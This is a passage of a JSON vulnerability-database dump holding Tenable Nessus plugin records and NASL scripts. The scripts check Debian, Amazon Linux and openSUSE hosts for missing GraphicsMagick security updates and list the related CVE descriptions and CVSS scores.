"https://www.tenable.com/plugins/nessus/93968", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-651-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93968);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7449\", \"CVE-2016-7800\");\n\n script_name(english:\"Debian DLA-651-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various security issues were found and fixed in graphicsmagick in\nDebian wheezy LTS.\n\nCVE-2016-7446\n\nHeap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\nHeap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\nTIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\nFix unsigned underflow leading to heap overflow when parsing 8BIM\nchunk.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/10/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T15:31:12", "description": "Memory information disclosure in DescribeImage function in magick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file, because of a heap-based buffer over-read. The portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. This vulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain increments are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the ReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions, 0.5.0 and later, that use a different structure type. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application hang in the ReadBMPImage function (coders/bmp.c). Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26 creates a pixel cache before a successful read of a scanline, which allows remote attackers to cause a denial of service (resource consumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was found in the function ReadMNGImage in coders/png.c when a small MNG file has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage() function in coders/cmyk.c when processing multiple frames that have non-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function in magick/pixel_cache.c during writing of Magick Persistent Cache (MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (application crash) during JNG reading via a zero-length color_image data structure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the WritePCLImage() function in coders/pcl.c during writes of monochrome images. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage() function in coders/rgb.c when processing multiple frames that have non-identical widths. (CVE-2017-11636)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-09T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2018-5685"], "modified": "2019-07-10T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:GraphicsMagick", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo", "p-cpe:/a:amazon:linux:GraphicsMagick-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-doc", "p-cpe:/a:amazon:linux:GraphicsMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-966.NASL", "href": "https://www.tenable.com/plugins/nessus/107237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-966.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107237);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2018-5685\");\n script_xref(name:\"ALAS\", value:\"2018-966\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Memory information disclosure in DescribeImage function in\nmagick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure\nvulnerability found in the DescribeImage function of the\nmagick/describe.c file, because of a heap-based buffer over-read. The\nportion of the code containing the vulnerability is responsible for\nprinting the IPTC Profile information contained in the image. This\nvulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain\nincrements are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the\nReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in\nWriteWEBPImage in coders/webp.c, related to an incompatibility with\nlibwebp versions, 0.5.0 and later, that use a different structure\ntype. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application\nhang in the ReadBMPImage function (coders/bmp.c). Remote attackers\ncould leverage this vulnerability to cause a denial of service via an\nimage file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26\ncreates a pixel cache before a successful read of a scanline, which\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was\nfound in the function ReadMNGImage in coders/png.c when a small MNG\nfile has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage()\nfunction in coders/cmyk.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function\nin magick/pixel_cache.c during writing of Magick Persistent Cache\n(MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadMNGImage in coders/png.c, related to accessing one byte before\ntesting whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in\nReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in\nReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause\na denial of service (heap-based buffer overflow and application crash)\nor possibly have unspecified other impact via a crafted file, related\nto the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap\ndata beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26\nallows remote attackers to cause a denial of service (application\ncrash) during JNG reading via a zero-length color_image data\nstructure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the\nWritePCLImage() function in coders/pcl.c during writes of monochrome\nimages. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage()\nfunction in coders/rgb.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11636)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-966.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.28-1.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:26", "description": "This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-11643: Heap overflow in WriteRGBImage() in coders/rgb.c could lead to denial of service [boo#1050611]\n\n - CVE-2017-11636: Heap overflow in WriteCMYKImage()function in coders/cmyk.c could lead to denial of service [boo#1050674]", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2017-966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11636", "CVE-2017-11643"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-966.NASL", "href": "https://www.tenable.com/plugins/nessus/102771", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-966.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102771);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-11636\", \"CVE-2017-11643\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2017-966)\");\n script_summary(english:\"Check for the openSUSE-2017-966 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-11643: Heap overflow in WriteRGBImage() in\n coders/rgb.c could lead to denial of service\n [boo#1050611]\n\n - CVE-2017-11636: Heap overflow in\n WriteCMYKImage()function in coders/cmyk.c could lead to\n denial of service [boo#1050674]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050674\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debugsource-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-devel-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-devel-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick3-config-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-11.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-devel-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 